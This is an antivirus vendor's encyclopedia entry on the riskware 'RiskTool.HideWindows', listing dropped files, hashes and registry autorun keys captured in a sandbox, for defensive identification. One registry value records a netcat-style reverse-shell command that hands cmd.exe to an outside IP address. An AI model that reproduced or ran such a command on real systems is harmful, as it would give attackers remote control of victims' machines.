Max Secure Software: Encyclopedia

Home / Spyware Encyclopedia / RiskTool.HideWindows << Back

Recommendation to Automatically remove RiskTool.HideWindows

Our products can remove RiskTool.HideWindows and thousands of other Virus and Spyware automatically and instantly.

RiskTool.HideWindows Details

Category RiskTool
Discovered 4/15/2010 5:05:31 PM
Modified 9/2/2024 11:33:47 AM
Threat Level High
Category Description
This is an application that is not necessarily harmful if properly installed by the user or administrator of the PC, but which could be harmful or disruptive to the user, PC, or network if deployed by unauthorized parties for potentially malicious purposes

The following Files were created:

VALUE	FILESIZE	COMPANYNAME	VERSION	SIGNATURE
7E6BB941.EXE	3846144	Xvision	2.02	605b1f7787bb1f860af539a6566978b7
4faf1e1e.exe	687429	welcome	1.1.1.2	2e6da971957f081e2ef4d134bb5e9600
8c581ad4.exe	1462669	tobias schiek	0.0.0.0	d36613614fd748d6345a2b772715cbe6
b18a4328.exe	18794765	oleg n. scherbakov	1.2.0.552
af289ce2.exe	707778	my came	1.1.1.2	0048ece3ec8a74a392ac77b8956c7148
devcheck.exe	24064	GrT	1.44	dafd26a375df593a8d341ff5ec0c4cf9
eguiepfwlang.dll	177408	eset	3.0.710.0	f896ec5ea30a8366fcbaf95911bf9ace
eplgoe.dll	247040	eset	3.0.710.0	f726193bf5f67dbecc7a80a48927dfa8
eplgoeemon.dll	185600	eset	3.0.710.0	e9b74d2ae77f3861c47744fda8bbc2dd
updater.dll	177408	eset	3.0.710.0	dc67c628c70788407dcff7584d794280

The following Registry Entries were created:

..\Software\Microsoft\Windows\CurrentVersion\Run\\"regedit"\"%das.au.ls%\temp\gsf4\zlip.exe"

..\Software\Microsoft\Windows\CurrentVersion\Run\\"Sexya2"\"%WIN.SYS32%\SSSSSSSSSSSSS\Sexya2.exe"

..\Software\Microsoft\Windows\CurrentVersion\Run\\"WinReg"\"%PF%\cute\svchost.exe"

..\Software\Microsoft\Windows\CurrentVersion\Run\\"WinXPService"\"%ROOT%\winnt\system32\Lavan\system32.exe"

..\Software\Microsoft\Windows\CurrentVersion\Run\\"od-padr87"\"%PF%\Webdialer\792be032.exe -m"

..\Software\Microsoft\Windows\CurrentVersion\Uninstall\Webdialer_od-padr87\(Default)

..\Software\Microsoft\Windows\CurrentVersion\Run\\"MSN"\"%DAS.AU%\UPDATE\MSN.EXE -D -E CMD.EXE 190.18.44.235 80"

..\System\CurrentControlSet\Services\SYNTPS\(Default)

..\Software\adrian lopez\(Default)

..\Software\webdialer\(Default)

Notice
Please note that the following information is not controlled or endorsed by Max Secure Software. They are captured automatically by tools in our malware Research Lab as a result of executing Spyware Files or browsing Internet in virtual environment. Please contact us if you find any information inappropriate for removal. All the work contained in this report is copyrighted and should not be copied without permission from Max Secure Antivirus. We do not recommend browsing or removing these entries on your own manually. We do not take any warranty against the use or result of the use of this information.

Home / Malware Encyclopedia << Back

Recommendation to Automatically remove RiskTool.HideWindows

RiskTool.HideWindows Details

Useful Links